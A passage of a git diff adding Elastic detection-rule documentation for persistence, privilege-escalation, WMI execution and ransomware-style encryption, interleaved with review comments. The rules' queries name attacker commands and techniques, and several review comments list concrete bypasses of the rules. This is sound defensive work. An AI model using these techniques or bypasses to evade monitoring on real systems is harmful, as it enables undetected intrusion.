+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-spike-in-bytes-sent-to-an-external-device.asciidoc @@ -0,0 +1,58 @@ +[[prebuilt-rule-8-10-5-spike-in-bytes-sent-to-an-external-device]] +=== Spike in Bytes Sent to an External Device + +A machine learning job has detected high bytes of data written to an external device. In a typical operational setting, there is usually a predictable pattern or a certain range of data that is written to external devices. An unusually large amount of data being written is anomalous and can signal illicit data copying or transfer activities. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-2h ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/ded + +*Tags*: + +* Use Case: Data Exfiltration Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Exfiltration + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over Physical Medium +** ID: T1052 +** Reference URL: https://attack.mitre.org/techniques/T1052/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-ssh-authorized-keys-file-modification.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-ssh-authorized-keys-file-modification.asciidoc new file mode 100644 index 0000000000..71da98a49e 
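Review bot: the description of this rule is word-for-word the Airdrop rule's text with "via Airdrop" removed, and the investigation guide is again an empty block. Since both rules come from the same integration, the description should say what the integration counts as an "external device" for this rule and whether Airdrop transfers also fall under it, so analysts know whether the two rules overlap or are disjoint; the job ID behind the rule should be named for the same reason as in the Airdrop page.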
--- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-ssh-authorized-keys-file-modification.asciidoc 
@@ -0,0 +1,100 @@ +[[prebuilt-rule-8-10-5-ssh-authorized-keys-file-modification]] +=== SSH Authorized Keys File Modification + +The Secure Shell (SSH) authorized_keys file specifies which users are allowed to log into a server using public key authentication. Adversaries may modify it to maintain persistence on a victim host by adding their own public key(s). + +*Rule type*: new_terms + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* OS: macOS +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Tactic: Persistence +* Data Source: Elastic Defend + +*Version*: 204 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:file and event.type:(change or creation) and + file.name:("authorized_keys" or "authorized_keys2" or "/etc/ssh/sshd_config" or "/root/.ssh") and + not process.executable: + (/Library/Developer/CommandLineTools/usr/bin/git or + /usr/local/Cellar/maven/*/libexec/bin/mvn or + /Library/Java/JavaVirtualMachines/jdk*.jdk/Contents/Home/bin/java or + /usr/bin/vim or + /usr/local/Cellar/coreutils/*/bin/gcat or + /usr/bin/bsdtar or + /usr/bin/nautilus or + /usr/bin/scp or + /usr/bin/touch or + /var/lib/docker/* or + /usr/bin/google_guest_agent or + /opt/jc/bin/jumpcloud-agent) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: SSH Authorized Keys +** 
ID: T1098.004 +** Reference URL: https://attack.mitre.org/techniques/T1098/004/ +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Service Session Hijacking +** ID: T1563 +** Reference URL: https://attack.mitre.org/techniques/T1563/ +* Sub-technique: +** Name: SSH Hijacking +** ID: T1563.001 +** Reference URL: https://attack.mitre.org/techniques/T1563/001/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: SSH +** ID: T1021.004 +** Reference URL: https://attack.mitre.org/techniques/T1021/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-startup-folder-persistence-via-unsigned-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-startup-folder-persistence-via-unsigned-process.asciidoc new file mode 100644 index 0000000000..38782da9fc --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-startup-folder-persistence-via-unsigned-process.asciidoc 
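Review bot: in the SSH Authorized Keys query, `file.name:("authorized_keys" or "authorized_keys2" or "/etc/ssh/sshd_config" or "/root/.ssh")` can never match the last two values: `file.name` holds only the base name, so those path values need to be on `file.path`. Either move them to `file.path` or drop them, and if `sshd_config` is kept the title and description (which talk only about `authorized_keys`) should mention it. The exclusion list also whitelists `/usr/bin/vim` and `/usr/bin/touch`; an operator appending a key with vim is exactly the scenario the description describes, so those two entries need a comment on why they are excluded.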
@@ -0,0 +1,153 @@ +[[prebuilt-rule-8-10-5-startup-folder-persistence-via-unsigned-process]] +=== Startup Folder Persistence via Unsigned Process + +Identifies files written or modified in the startup folder by unsigned processes. Adversaries may abuse this technique to maintain persistence in an environment. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Startup Folder Persistence via Unsigned Process + +The Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence. + +This rule looks for unsigned processes writing to the Startup folder locations. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. 
+- Investigate other alerts associated with the user/host during the past 48 hours. +- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the file using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. 
+ - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + +### False positive analysis + +- There is a high possibility of benign legitimate programs being added to Startup folders. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign. + +### Related rules + +- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff +- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. 
+- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+ +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.entity_id with maxspan=5s + [process where host.os.type == "windows" and event.type == "start" and process.code_signature.trusted == false and + /* suspicious paths can be added here */ + process.executable : ("C:\\Users\\*.exe", + "C:\\ProgramData\\*.exe", + "C:\\Windows\\Temp\\*.exe", + "C:\\Windows\\Tasks\\*.exe", + "C:\\Intel\\*.exe", + "C:\\PerfLogs\\*.exe") + ] + [file where host.os.type == "windows" and event.type != "deletion" and user.domain != "NT AUTHORITY" and + file.path : ("C:\\Users\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*", + "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\*") + ] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Autostart Execution +** ID: T1547 +** Reference URL: https://attack.mitre.org/techniques/T1547/ +* Sub-technique: +** Name: Registry Run Keys / Startup Folder +** ID: T1547.001 +** Reference URL: https://attack.mitre.org/techniques/T1547/001/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-sudo-command-enumeration-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-sudo-command-enumeration-detected.asciidoc new file mode 100644 index 0000000000..0e2f5f073b --- /dev/null 
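Review bot: in the Startup Folder rule's investigation guide, the step "Investigate potentially compromised accounts ... login events (for example, 4624) to the target host after the registry modification" refers to a registry modification, but this rule matches a file write to the Startup folder; change it to "after the file write". In the query, `process.code_signature.trusted == false` in the first sequence step only matches when the field is present and false; please confirm Elastic Defend sets `trusted: false` rather than omitting the field for binaries with no signature at all, otherwise the "unsigned" case in the title is missed and `(process.code_signature.trusted == false or process.code_signature.exists == false)` would be the safer predicate.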
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-sudo-command-enumeration-detected.asciidoc @@ -0,0 +1,62 @@ +[[prebuilt-rule-8-10-5-sudo-command-enumeration-detected]] +=== Sudo Command Enumeration Detected + +This rule monitors for the usage of the sudo -l command, which is used to list the allowed and forbidden commands for the invoking user. Attackers may execute this command to enumerate commands allowed to be executed with sudo permissions, potentially allowing to escalate privileges to root. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Discovery +* Data Source: Elastic Defend + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and +process.name == "sudo" and process.args == "-l" and process.args_count == 2 and +process.parent.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and +not group.Ext.real.id : "0" and not user.Ext.real.id : "0" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: System Owner/User Discovery +** ID: T1033 +** Reference URL: https://attack.mitre.org/techniques/T1033/ 
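Review bot: in the Sudo Command Enumeration query, `process.args == "-l" and process.args_count == 2` pins the match to the exact two-token invocation `sudo -l`; the same enumeration via `sudo --list`, `sudo -ll` or `sudo -l -U <user>` (different token or a different args_count) is not covered, while the description claims to monitor "usage of the sudo -l command" in general. Either widen the predicate (for example `process.args in ("-l", "-ll", "--list")` without the args_count pin, plus exclusions for known admin tooling) or state the exact form matched in the description.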
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-sudoers-file-modification.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-sudoers-file-modification.asciidoc new file mode 100644 index 0000000000..1b31d0409b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-sudoers-file-modification.asciidoc @@ -0,0 +1,65 @@ +[[prebuilt-rule-8-10-5-sudoers-file-modification]] +=== Sudoers File Modification + +A sudoers file specifies the commands that users or groups can run and from which terminals. Adversaries can take advantage of these configurations to execute commands as other users or spawn processes with higher privileges. + +*Rule type*: new_terms + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* OS: macOS +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Elastic Defend + +*Version*: 203 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:file and event.type:change and file.path:(/etc/sudoers* or /private/etc/sudoers*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Sudo and Sudo Caching +** ID: T1548.003 +** Reference URL: https://attack.mitre.org/techniques/T1548/003/ 
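Review bot: the Sudoers File Modification query keys only on `event.type:change`, whereas the SSH Authorized Keys rule in the same package uses `event.type:(change or creation)`; dropping a new file into `/etc/sudoers.d/` produces a creation event and may not produce a change event, so either add `creation` or document why it is excluded. Note also that `file.path:(/etc/sudoers* ...)` matches `/etc/sudoers.tmp`, the temporary file `visudo` writes before renaming it into place, so legitimate visudo edits match on both paths; worth a comment in the query.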
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suid-sguid-enumeration-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suid-sguid-enumeration-detected.asciidoc new file mode 100644 index 0000000000..891f5dccc7 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suid-sguid-enumeration-detected.asciidoc 
@@ -0,0 +1,82 @@ +[[prebuilt-rule-8-10-5-suid-sguid-enumeration-detected]] +=== SUID/SGUID Enumeration Detected + +This rule monitors for the usage of the "find" command in conjunction with SUID and SGUID permission arguments. SUID (Set User ID) and SGID (Set Group ID) are special permissions in Linux that allow a program to execute with the privileges of the file owner or group, respectively, rather than the privileges of the user running the program. In case an attacker is able to enumerate and find a binary that is misconfigured, they might be able to leverage this misconfiguration to escalate privileges by exploiting vulnerabilities or built-in features in the privileged program. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Discovery +* Tactic: Privilege Escalation +* Data Source: Elastic Defend + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and +process.name == "find" and process.args : "-perm" and process.args : ( + "/6000", "-6000", "/4000", "-4000", "/2000", "-2000", "/u=s", "-u=s", "/g=s", "-g=s", "/u=s,g=s", "/g=s,u=s" +) and not ( + user.Ext.real.id == "0" or group.Ext.real.id == "0" or process.args_count >= 12 or + (process.args : "/usr/bin/pkexec" and process.args : "-xdev" and process.args_count == 7) +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ 
+* Technique: +** Name: File and Directory Discovery +** ID: T1083 +** Reference URL: https://attack.mitre.org/techniques/T1083/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Setuid and Setgid +** ID: T1548.001 +** Reference URL: https://attack.mitre.org/techniques/T1548/001/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-cmd-execution-via-wmi.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-cmd-execution-via-wmi.asciidoc new file mode 100644 index 0000000000..18f7ac4c13 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-cmd-execution-via-wmi.asciidoc 
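Review bot: the title `SUID/SGUID Enumeration Detected`, the anchor and the file name all use "SGUID", which is not a term; the description itself correctly says "SGID (Set Group ID)". Rename to SUID/SGID (the anchor id changes with it, so check any cross-references in the package summary). In the query, the `-perm` value list covers the `u=s`/`g=s` spellings but not the `u+s`/`g+s` forms that `find` also accepts, so `find / -perm -u+s` slips through; and the exclusion `process.args : "/usr/bin/pkexec" and process.args : "-xdev" and process.args_count == 7` should carry a comment naming the tool whose scan it suppresses.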
@@ -0,0 +1,81 @@ +[[prebuilt-rule-8-10-5-suspicious-cmd-execution-via-wmi]] +=== Suspicious Cmd Execution via WMI + +Identifies suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.parent.name : "WmiPrvSE.exe" and process.name : "cmd.exe" and + process.args : "\\\\127.0.0.1\\*" and process.args : ("2>&1", "1>") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Windows Management Instrumentation +** ID: T1047 +** Reference URL: https://attack.mitre.org/techniques/T1047/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ 
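Review bot: the query `process.parent.name : "WmiPrvSE.exe" and process.name : "cmd.exe" and process.args : "\\\\127.0.0.1\\*" and process.args : ("2>&1", "1>")` is a signature for cmd output redirected to a loopback-addressed share (the pattern Impacket's wmiexec.py uses), not the generic "suspicious command execution via WMI on a remote host" the title and description promise; a remote `Win32_Process.Create` that does not redirect output will not fire. Please state that scope in the description and replace `*References*: None` with a reference to the tooling behaviour. The `==== Investigation guide` block here is also empty.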
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-content-extracted-or-decompressed-via-funzip.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-content-extracted-or-decompressed-via-funzip.asciidoc new file mode 100644 index 0000000000..cbf3819f1b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-content-extracted-or-decompressed-via-funzip.asciidoc 
@@ -0,0 +1,83 @@ +[[prebuilt-rule-8-10-5-suspicious-content-extracted-or-decompressed-via-funzip]] +=== Suspicious Content Extracted or Decompressed via Funzip + +Identifies when suspicious content is extracted from a file and subsequently decompressed using the funzip utility. Malware may execute the tail utility using the "-c" option to read a sequence of bytes from the end of a file. The output from tail can be piped to funzip in order to decompress malicious code before it is executed. This behavior is consistent with malware families such as Bundlore. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://attack.mitre.org/software/S0482/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action in ("exec", "exec_event") and +((process.args == "tail" and process.args == "-c" and process.args == "funzip")) and +not process.args : "/var/log/messages" and +not process.parent.executable : ("/usr/bin/dracut", "/sbin/dracut", "/usr/bin/xargs") and +not (process.parent.name in ("sh", "sudo") and process.parent.command_line : "*nessus_su*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* 
Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Obfuscated Files or Information +** ID: T1027 +** Reference URL: https://attack.mitre.org/techniques/T1027/ +* Technique: +** Name: Deobfuscate/Decode Files or Information +** ID: T1140 +** Reference URL: https://attack.mitre.org/techniques/T1140/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-data-encryption-via-openssl-utility.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-data-encryption-via-openssl-utility.asciidoc new file mode 100644 index 0000000000..a8977c996c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-data-encryption-via-openssl-utility.asciidoc 
@@ -0,0 +1,68 @@ +[[prebuilt-rule-8-10-5-suspicious-data-encryption-via-openssl-utility]] +=== Suspicious Data Encryption via OpenSSL Utility + +Identifies when the openssl command-line utility is used to encrypt multiple files on a host within a short time window. Adversaries may encrypt data on a single or multiple systems in order to disrupt the availability of their target's data and may attempt to hold the organization's data to ransom for the purposes of extortion. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/ +* https://www.trendmicro.com/en_us/research/21/f/bash-ransomware-darkradiation-targets-red-hat--and-debian-based-linux-distributions.html + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Impact +* Data Source: Elastic Defend + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, user.name, process.parent.entity_id with maxspan=5s + [ process where host.os.type == "linux" and event.action == "exec" and + process.name == "openssl" and process.parent.name : ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "perl*", "php*", "python*", "xargs") and + process.args == "-in" and process.args == "-out" and + process.args in ("-k", "-K", "-kfile", "-pass", "-iv", "-md") and + /* excluding base64 encoding options and including encryption password or key params */ + not process.args in ("-d", "-a", "-A", "-base64", "-none", "-nosalt") ] with runs=10 + +---------------------------------- + +*Framework*: MITRE 
ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Encrypted for Impact +** ID: T1486 +** Reference URL: https://attack.mitre.org/techniques/T1486/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-dll-loaded-for-persistence-or-privilege-escalation.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-dll-loaded-for-persistence-or-privilege-escalation.asciidoc new file mode 100644 index 0000000000..c8a4da9876 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-dll-loaded-for-persistence-or-privilege-escalation.asciidoc 
@@ -0,0 +1,168 @@ +[[prebuilt-rule-8-10-5-suspicious-dll-loaded-for-persistence-or-privilege-escalation]] +=== Suspicious DLL Loaded for Persistence or Privilege Escalation + +Identifies the loading of a non Microsoft signed DLL that is missing on a default Windows install (phantom DLL) or one that can be loaded from a different location by a native Windows process. This may be abused to persist or elevate privileges via privileged file write vulnerabilities. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://itm4n.github.io/windows-dll-hijacking-clarified/ +* http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html +* https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html +* https://shellz.club/2020/10/16/edgegdi-dll-for-persistence-and-lateral-movement.html +* https://windows-internals.com/faxing-your-way-to-system/ +* http://waleedassar.blogspot.com/2013/01/wow64logdll.html + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Privilege Escalation +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and 